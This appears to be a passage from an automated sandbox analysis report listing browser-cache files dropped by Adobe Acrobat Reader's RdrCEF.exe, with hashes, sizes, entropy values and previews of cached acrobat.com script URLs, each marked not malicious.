                                                                                                          SHA1:6927F6A82124826D7D2FC790E43F6417055C6332
                                                                                                          SHA-256:C97A4F7E04B859CEA43C3C66F576E27BD934A50DFF2AD341878BC60A08BFE41D
                                                                                                          SHA-512:D98C905448C4731A780E9515A2E3F2D911555E37AB3C83A4B5C7342FFEE206B47D816AE8C748BFFCB23F8FF4C9FCFDEFCFE43846938014D538DD23983D3EFE25
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js ..A..Eo...................................*"Jn........1.x.'.vI..*|Z..o...+.4....0..A..Eo.........f........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):250
                                                                                                          Entropy (8bit):5.267344042788786
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mMyEYOFLvEWdVFLBKFjVFLBKFlQhu0H6tuot/RlUoSjGYDYt:DyeRVFAFjVFAFQaZtZlUo6ct
                                                                                                          MD5:A20A95A985D905C15841D3BD171E80C8
                                                                                                          SHA1:1CC1C3E0CF3463CEEB49D0CB5F489A045CA7F54C
                                                                                                          SHA-256:6DB28C6429C614AFE7319DE2E8006CDDA9D88CB5CFEE204EC3EA2BFD32222F84
                                                                                                          SHA-512:21638DD5F42F8BBA9D13677520FF58B7D84EE3B5B5177ED17B6DF9BA22E059E954062CBC56FCAB8009EA2BB4A404C32CF3960EC261FA37FC98C7FE9EABF16A7C
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js ..A..Eo...................................*"JB.........hvDO.N.t@.....n.*...... ....A..Eo........N.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):198
                                                                                                          Entropy (8bit):5.330820195061307
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lyI5a8RzYOjGLvHkRzNrgG9gWBH5kt1llhaBll3qeW1pkgmcE:mG5YO6LvEV5goTBH6tmB/aeuK
                                                                                                          MD5:22083C11201A9E51649DCA1FCCB98222
                                                                                                          SHA1:E48467E1D1DA3480EEF3B51888462316C075DFFD
                                                                                                          SHA-256:CF11C4DC5835837F4835FDA7A4E7011D2B4FAC190D91FE7550A8BE7DCDA7AFCC
                                                                                                          SHA-512:9F02DF94C60D6C7221C354CB327EC651A6FB8EEBE66E2B84E9505F142E354951CCE2994FB7BEDFA645359388F9ADE66CBFD20D68BED02CD1657233AF851EDFDB
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......B...-..T...._keyhttps://rna-v2-resource.acrobat.com/__VERSION__/dc-extras.js ..A..Eo...................................*"Jg.......Z....m.r*.........h..3K..[..@D.A..Eo......1...........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):196
                                                                                                          Entropy (8bit):5.280537253724756
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lWCVv8RzYOjGLvHkRzNrgG7KAH5kt1llhB7htllHsVgBYmbzUmfsaX/:mEVEYO6LvEV5gu3H6tiKum/f1
                                                                                                          MD5:8E05A0F0C647AF3CE17F2F3E0E599DA4
                                                                                                          SHA1:41CB3A7AD739DFD13B3F53352B067CC8663DF4D9
                                                                                                          SHA-256:9D77F63E29A74AA893B67781CF9E0AB0F4ED40272D9926B4B093527966B01679
                                                                                                          SHA-512:C65FCD9A2AD8FFD6514BEE4205AF928D95DB2CA15ED1550DAA24A207CCB57E5FF5F99CF5A66F41A636F164BF99174FC9B7DED22C590CB66442E8F7DA1BBACD3B
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......@.........._keyhttps://rna-v2-resource.acrobat.com/__VERSION__/dc-core.js ..A..Eo...................................*"J........"....E\..8..$}..<D bg...\.%+..*..A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.383870787350668
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mavHYO6LvEwQlRmVH0tu0H6twDiU/Nvon1JP:pOQKIu0a2DiU/N8B
                                                                                                          MD5:DEABB06B326196BC96AACA4C25D7EC4C
                                                                                                          SHA1:BADF6F0E43580F34E1F678E0D0AB3BC68CF59EC4
                                                                                                          SHA-256:6C67083F90FCDD34D079CB5C1B164645B347610C100397601A7AAB665CD75018
                                                                                                          SHA-512:5891F2FC3DB8EABBE1A94A1707ADDCA25921A62D05A4854C8EB151BA21D490EF050F76E4805977DAEF327E8359F2F1158927341051D08E785863F6983E55B6BC
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y...#......._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/5450-chunk.js ..A..Eo...................................*"J........r........$.r.....U...+cC...4?.A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):214
                                                                                                          Entropy (8bit):5.204819133105342
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:m+yiXYOFLvEWd7VIGXVu0H6tKiEVVyh9PT4J2:pyixRuya4iEVV41Th
                                                                                                          MD5:2304E485B864507484241D5A4557FAF5
                                                                                                          SHA1:49F40DEF5CFB0B6852AA0E382919F3025A3AD989
                                                                                                          SHA-256:0ACD26A2386481B45900D11DF89408947CA98B55BA235E321159721209BF9D20
                                                                                                          SHA-512:EF6F0BA831F47DF3D3336DA43AFB4A7B8DBC05AD5036D7AF829B8CF5769F565D31F30C7897CB64A10270FC96103F22C936E9A2AD7D930A2D38B755AEA84DBDDA
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js ..A..Eo...................................*"JK.......k.Q.....-_..y.....O...>..1....A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.35507201822578
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mast6EYO6LvEwQlRmVU5ku0H6tAeW8ozrpy9:I9OQKS5ku0a2h8H9
                                                                                                          MD5:423887BC3E558987DB9DFCF4F9A6B52C
                                                                                                          SHA1:BE4DA4D5C7E8CD38E7B81144E90900259EABF819
                                                                                                          SHA-256:BCF7AD3C99EB15B2F44ADC45A1C39C591AFDE062FE13C85E2B36579D051C2C2C
                                                                                                          SHA-512:CD15934347A6604F5D37DE40F59A91E07A4B4809708690602E603B5739F68A4078D4D368F9CFC39E75F40AEDB9878D0960F1F399A6A708D344E4DE38B329C4B8
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y...K..$...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/2241-chunk.js ..A..Eo...................................*"J.........q@...`k...5(......Y}.c<....W...A..Eo......>"..........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.416770986657452
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lze//lA8RzYOjGLvHkwIBIXeRmBVtu0H5kt1llhWgdN7YL0p4mRHl:maOPYO6LvEwQlRmVtu0H6tvbR
                                                                                                          MD5:294AE0EC6DB885590B07D85D130377FE
                                                                                                          SHA1:D65481CB9791374C9E2B5C40C0479AACF3CE2783
                                                                                                          SHA-256:A7414FA2B5201C1D77F6124A2A0DB4A1D095DE98C3720970F035F29DE9AD55D7
                                                                                                          SHA-512:3116DE751DE6D6BD64D4FC7348A2CCA23D302850FB70B738020D2223DEE35013BE4B04A6CB832CB1F189BB48D0228E9EBD4EEA2A110A778D129C88655CF1F734
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y...1..C...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/4782-chunk.js ..A..Eo...................................*"J(.......(+.......(...q..2.W.;......B..A..Eo.......x..........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):220
                                                                                                          Entropy (8bit):5.274368763605362
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lifll08RzYOCGLvHkWBGKuKjXKoyNjXKLuVGH5kt1llh39vnlYo2sZI8xeGvPk:mvYOFLvEWdhwjQNH6tP3ZIl6P4v/
                                                                                                          MD5:E436D3C7BE1F65A933D4754AC8CC814E
                                                                                                          SHA1:48D09F4603FB7D6E2ADD86E8D8D13161B5AC0673
                                                                                                          SHA-256:8DC9ED843532EE83F27AD6C8E35571337C83740CFCFA9AE1F2191DE20A9ABAE2
                                                                                                          SHA-512:7131605A146E4908F5DE426CDF7DE11797AE4E3DEB40BB936ED14FD5FB7B9FD693F12DE58FBB8842F589C291ECD651B27BBB824131E6E94415D10A751083DDEE
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js ..A..Eo...................................*"J........].>....uUf..N...k......c..l.A..Eo......Vd..........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.302833516378875
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:maiXYO6LvEwQlRmVLeku0H6tAn9Vr1xnK4py9:cOQKru0a29W9
                                                                                                          MD5:1E8AC236EEAB7B1795264356D31A47A6
                                                                                                          SHA1:EC5F0B1BBD48942ED5B5F61A81BC770A9E07117A
                                                                                                          SHA-256:7B9DAE7571AE037D2B9BDC73229A9B5EBA75F5382D3C643F7BABFAF810897566
                                                                                                          SHA-512:1C1B50CB7A7185EF7FCCC697B9BE38CF55F60B5C4681112FC4D961B2FF06F23D85A42955F54F96CE2F8DDE8689E4E9DEF20D7EB942427564E05C1D6204791CC9
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y....qI...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/7347-chunk.js ..A..Eo...................................*"J.........P.>..X.t\n....&k..)n....ry..P..A..Eo......>"..........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):213
                                                                                                          Entropy (8bit):5.175444452986559
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lZd8RzYOCGLvHkWBGKuKjXKX7KoQRA/KVdKLuVGH5kt1llhxCJlRPcyxMtv9EH:mJYOFLvEWdGQRQOdQNH6tQJrD6gd
                                                                                                          MD5:1A24656C8CD07CC2544730408675DB9C
                                                                                                          SHA1:BF8AA7EA8D189E29E871E895DF29CF627D66DD17
                                                                                                          SHA-256:66BA1BA1A2FE31BBE6175521A611FF834B3F68C459E20F0A4FCAE7071A9DB479
                                                                                                          SHA-512:DD6CC36C3F29E30B5704D4151AEE9D0A49E5157F19D8BDDC3BBE0A1E1ADE7F6FE12E1F5F8674A988578BAAA58678C7D06863398D70E91693DE2BCED18A0EBF8E
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js ..A..Eo...................................*"JL.........c..y/L....|y.n..C/I.....X7-ne.A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):183
                                                                                                          Entropy (8bit):5.1373765311253665
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lLp08RzYOCGLvHkfaMMuVGH5kt1llhMBzt2cQMWqg4nRb7om5mb5/tl:mOYOFLvECMLGH6twBz8NuR/4b
                                                                                                          MD5:EA2659466E4CD15921FD1A2D1586E956
                                                                                                          SHA1:F8FAEDDF3CAF54B85105EFFDA58387A48DAF203D
                                                                                                          SHA-256:E73C2831FDC22508441299F9E9DB5750810164FF15485C6CA91A1039013D4EDD
                                                                                                          SHA-512:C77CC25CE912B259CD70F0F5995B75027884E11FFB123AB1B55FFBB3B2F3F4C997AEC13DC4CB12FE63F9C8A46CA356B5803993D39FA3D8524E9DCB02CF186A84
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ..A..Eo...................................*"Jq........y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.345687249351811
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:maZmEYO6LvEwQlRmVlXu0H6tr4RgD9kP4:seOQKzXu0aagO
                                                                                                          MD5:B5C59321B41B270165C34C76200A5E0D
                                                                                                          SHA1:0E1E08AA3BEFAD2375D7FDCED97D1450F55B8C72
                                                                                                          SHA-256:4135443DBE2DB1B2F2862E232C166350603073475F2BEC9D3E79A2C4B8133590
                                                                                                          SHA-512:AEBAAD17D8BB24A085366E76AE8D1601E7E18DBC30F613A33A963971C12B7F9BE906701156A75F515B2550FECDB18D6556D5BEBAC638657B82AF574B67596780
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y...e..6...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/9217-chunk.js ..A..Eo...................................*"J#........t......?.>7...w..Qh.X... ;.4...A..Eo.......d.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):220
                                                                                                          Entropy (8bit):5.333205211116413
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mhYO6LvEV5g+VTI613H6tyBYMIxy+4n8+:2/5PRI613amjt++8
                                                                                                          MD5:DD0A0B64A641F1B229C9E6B101A9E5C5
                                                                                                          SHA1:FF94E3DB7F2ED72A2768D0E52676BB621E15952F
                                                                                                          SHA-256:1C47F2124B0F0F23733F35B52FFEE156337587A8B0C56C2965E1FA15A0310AE6
                                                                                                          SHA-512:28698E5B0BFB485F61B572D21EA3FC1BC4E6FC29B515F81189E658ECE57D75730CD684F3FAC96B538FEEA8ABC10D7F43487FBE917431E9D236CE5BE2A7237AC6
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......X.....*....._keyhttps://rna-v2-resource.acrobat.com/__VERSION__/dc-spectrum-web-components-core.js ..A..Eo...................................*"J........d..y+M.. ....LO.....g.!0+.ttCY..A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.343162812588907
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:ma3/XYO6LvEwQlRmVHGnu0H6tvGo4h8ABLf:L9OQK1Gnu0a5AL
                                                                                                          MD5:7C7ABF46FD9E10C9CA644633B2235B79
                                                                                                          SHA1:7C0350B0B2F8CD66C4E5ED179EE7946CC660CDEA
                                                                                                          SHA-256:4739707393E89269FF98B88A75EDE7476F20F5629D622E6FFEF0A543D5EFE7C8
                                                                                                          SHA-512:BDC0203496474DCEE5A2EB95679D8203D07771A09F546069BEC0F421B5155BA733045352A4F18DB02C33E04E275284AA96E5AC92D26C805BD33DC8857A1644EB
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y.....j...._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/9988-chunk.js ..A..Eo...................................*"J!........RknD..c...'......3.62+.!&R..;..A..Eo.......c..........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):181
                                                                                                          Entropy (8bit):5.114678102004504
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+l64HXlA8RzYOCGLvHkjXMLOWFvGH5kt1llhMBztz6d1dn76KohyP5mb5/tl:md4HXXYOFLvEjMSWFvGH6twBzkjUdyPa
                                                                                                          MD5:9ECB43F58ACDFEC2CF29BC7FF3CAFA60
                                                                                                          SHA1:4B2849BDEF0BA25CFDEB2EDA02A071E3CDA92386
                                                                                                          SHA-256:C55DD645D73D6BC016C235A6C980223368CDAC31AA205FE406CC2E00690A9461
                                                                                                          SHA-512:B65449722DE58F423F7FA0997C936D8D4FAD2756868817FBE0B16497D23615155C72B47B92DDBBD66D328A1F793BE76FD8CEA2011595A758E51B87E60A9C65E7
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ..A..Eo...................................*"Jq........PU ....t^.....a.k..u.7.M.BW6#}..A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):215
                                                                                                          Entropy (8bit):5.250301208946839
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:msNXYOFLvEWdpJWNKjQNH6tgDzu8E+IUGkAJ:BjRpJWNKjea8u8NID
                                                                                                          MD5:2305D575D42B57D1C69526CC2B3C507A
                                                                                                          SHA1:C235FCC3E9B9CC485B5BCF73036F1E35D2863E4E
                                                                                                          SHA-256:0166942CFD630FE5D0AFA761396BE7D2CD60203E52D7716CD93CE8EFC15B7565
                                                                                                          SHA-512:270A49BB5FF3752C2A8F76B7549C450F66B0E3034ABD1B3C3170BBFEA51CA7C12A4F70502547347AFF7EB6A11B8CF50CBFF31FD76DE5353753145406BA9E612A
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......S...9O......_keyhttps://rna-resource.acrobat.com/static/js/plugins/unified-share/js/plugin.js ..A..Eo...................................*"J........e.....@-H.>a..o..sh.5.A.x..C..A..Eo......V..{........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.378353678984724
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mai//6EYO6LvEwQlRmVNubLku0H6tNllmhkmW3c:W/yeOQKbuvku0azVBc
                                                                                                          MD5:330E072901EAEEB10064D37EB9EF9CD2
                                                                                                          SHA1:BBB8EACEA47B5BF59FECF8A5F6040206858D3497
                                                                                                          SHA-256:76E787BDEFB402A3E52E4ECF0A3BB3C2B75326BAB3D44D916D4241032225B5B9
                                                                                                          SHA-512:1982FD79A117920D387ADF1F3DB2ADE859876C64B8E888D3FF101375113C5DC28A3FF3687145D254E8B3BFCF51898A5688BB01FE6BB4A9B99F6419F15285729D
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y....b[....._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/1233-chunk.js ..A..Eo...................................*"J............;....(..Wd|....N.b.][A.N....A..Eo.......".T........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221
                                                                                                          Entropy (8bit):5.352297456904119
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mafl/VYO6LvEwQlRmVgu0H6tu/yhtlRsy045h5/:xOQKiu0a4/+tzLzh
                                                                                                          MD5:89D0BB17FA92BFB5667A69C32E7A01A5
                                                                                                          SHA1:BAAFB24F170FE3C98AB5EBCF6A0ECF30514B5660
                                                                                                          SHA-256:D4AFC1A0F5047ADDC00D9E9FBB83EEDBC3B95CEAF1EB76F9D24CBEA121A4CAEE
                                                                                                          SHA-512:66AB69F06436DD60B27CC735290DC2E87002383C4DA2EF3202F6868DFE1DEE8F58F74A2AE22451D1FED5E1A4444CAE935BF3ACB0A3A457B1C3256C7474E89121
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......Y..........._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/6985-chunk.js ..A..Eo...................................*"J$.........`.oA.i.l...v...F.....^\p..7....A..Eo.......m..........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):191
                                                                                                          Entropy (8bit):5.169114415929982
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lpSUlIv8RzYOCGLvHkWBGKuK2fKVLNH5kt1llhoHllxXUPqf9tsDMaPV44mlo1:mkl9YOFLvEWsfOLNH6tUH/yPqVyM+VYe
                                                                                                          MD5:15F7C389705A42F4BA609EF4FF3BE35C
                                                                                                          SHA1:04755039C2643A0EAF4C1132FBDB65F662373B27
                                                                                                          SHA-256:3CB80C68C886ABEA53A67BA80DE09B0D7A03E6C67641BBF9556DB8AF62D204BD
                                                                                                          SHA-512:CA9391066E56FC0C6506FE667BD5DB5B2959AAA5CE15F9AD0ABB928AC47AE9AEA16E82EB92C5B261D9C1B793D3814CE9F71AA51747C99E42812D048C7CFAC340
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js ..A..Eo...................................*"JU.........q.O...j....._y..L^z...?..@N..A..Eo........G)........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):248
                                                                                                          Entropy (8bit):5.305641314812655
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mt9YOFLvEWdVFLBKFjVFLBKFlyNH6toStwSeKaT9prih/:URVFAFjVFAFWaBtwSeKaTLGJ
                                                                                                          MD5:43D99E86A3F20065FB2E7749C17D90DE
                                                                                                          SHA1:454CA0782BC8F8CA0008442406111029A588A969
                                                                                                          SHA-256:71D130B6BAE5FC6C1DEDD90E1E9A942D09CD3B6A3D462643C9945F2E2F5AA65B
                                                                                                          SHA-512:665009129C5C2674CF66B9DD52E4B3BD1CE5E8FBC81E8D9286A6B75281F3D409AA820FDE83D46E161E05A2034D90C77B82B4E11688AAA8FB3EACFBA19EF22E9E
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ..A..Eo...................................*"J..............H...{...2../.k`..r4.C. .A..Eo.......v.........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):216
                                                                                                          Entropy (8bit):5.267054328004754
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lUZHWK8RzYOCGLvHkWBGKuKjXKKINiB4KPEEKPWFvGH5kt1llhthwF01iwIQxF:m8nYOFLvEWdfNBHYu0H6tvwF0kwU
                                                                                                          MD5:25B00EDFCB23A7B4C813CB29E9BB88CE
                                                                                                          SHA1:69FFF48F6DA5B1A73F4593755697F6080E1CDBE5
                                                                                                          SHA-256:7204A8C3DC0825BA1836A815D38A62A7D797EDA52597C14884F40C42FF2799A6
                                                                                                          SHA-512:4EF7561DD94E57349FAB1F1720F04D59229E29B38C525A095C563761A511C823094466BFB804DF7558E7E77752059F746FCBBE58C15A8569497A4FC98F456B82
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......T....."....._keyhttps://rna-resource.acrobat.com/static/js/plugins/task-handler/js/selector.js ..A..Eo...................................*"J.............8U-....a=...`#..VT.k......A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):230
                                                                                                          Entropy (8bit):5.335641398457226
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:m7YO6LvEwQlRmV1fOPHku0H6tGmPQCRyJjkYK:wOQKX2PEu0aAA4JE
                                                                                                          MD5:F3359A33F7FDC97D8B384D15D042DC52
                                                                                                          SHA1:89D2363A47FFD5982F9F00965D463ACC82DABF81
                                                                                                          SHA-256:29AB774E3FBB2C195C59A7A82131240E21D579CE411E1C21E764171627A2DD04
                                                                                                          SHA-512:EE4940746D6C61030832F197F418554649E72B8A4FF5EFEAE58113321C8D5875FB8B6B81645D3AAF78C556CCD1445ED05E028C3C3E7F673A0B9F2AFC6D87D096
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......b..........._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/desktop-verbs-chunk.js ..A..Eo...................................*"J................w....|'rq..h...]......A..Eo..................
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):214
                                                                                                          Entropy (8bit):5.2261423932381
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lzS9llC8RzYOCGLvHkWBGKuKTJHrWOmKVEZ9JvVGH5kt1llhdGQm0yYIG44mtJ:m0SdYOFLvEWjLH3Yrv0H6tHIGYtRl
                                                                                                          MD5:692C78BB20552D92C51203790E9ED665
                                                                                                          SHA1:59613EF20D0F10BC1A0C580FDCC64A67021CD2FE
                                                                                                          SHA-256:278014165135C4964A16330213B33F656EE0204AD8DA99567D3E23DC7EAD1C14
                                                                                                          SHA-512:9613A8BE449A880340B09D934EAD9C1B1EB29026CB607F9C5412BB41242FF2701943BD74A9BEDE40D25283C8F7F5080B38A4263AF8A07EAD4335D9A55976B566
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......R...!p......_keyhttps://rna-resource.acrobat.com/static/js/misc/altDekstopCopyPasteHelper.js ..A..Eo...................................*"J........./.vS}....W1m~.{.$W.U[m..l..<...A..Eo........ .........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):208
                                                                                                          Entropy (8bit):5.3470077943548775
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:mOYO6LvEV5g+VTIaBBH6t1TEzbDvS2y4:p/5PRIa3aHszS2y
                                                                                                          MD5:FEB8D94272BF8C109450D12C8AED69F7
                                                                                                          SHA1:7604B7B7C3337C4285F13CAC2B73E63F7384245A
                                                                                                          SHA-256:3B288AC47D75064EDC92ACEBDC4926ACD51DAD4BBCBDE7FB0D83B88BF826FC76
                                                                                                          SHA-512:F3D4C9150E2C1DB89D497097B59FF2161A626987D838FAB263FBC3050CCBA84AD88241C5235DD551C95A8ED4F4710B63775B481CA6695D22E4E07A09736C216E
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......L.........._keyhttps://rna-v2-resource.acrobat.com/__VERSION__/dc-spectrum-v3-core.js ..A..Eo...................................*"J............l.>........5..U.. G...y.A..Eo......GA..........
                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):215
                                                                                                          Entropy (8bit):5.174551614236089
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:m+lx4F08RzYOCGLvHkWBGKuKjXKGBIEGdevA/KPWFvGH5kt1llhzChsWyrpYFmWX:ms2VYOFLvEWdvBIEGdeXu0H6t6hs51i
                                                                                                          MD5:C58AE231E6FE611A246A94446CF22EC3
                                                                                                          SHA1:3CE2DDFFDCCBFC66A34907408829972C8BD9B786
                                                                                                          SHA-256:D663B44B88F5DA3332DFE2C6ED6D316A3F4667EE44E2A7360F10C66A3536AFC5
                                                                                                          SHA-512:F536CB174C990B3583E2645B0D5D765EB877620FDD12B6EF7A7443F21D5A3F6BB40FFC2554F9B6C0F4A4E906948AD81AE487E253C0CBAEBCFC5BE41AD53242FB
                                                                                                          Malicious:false
                                                                                                          Preview:0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js ..A..Eo...................................*"JN........A.o]@r..Q.....<w.....].n\....A..Eo.................
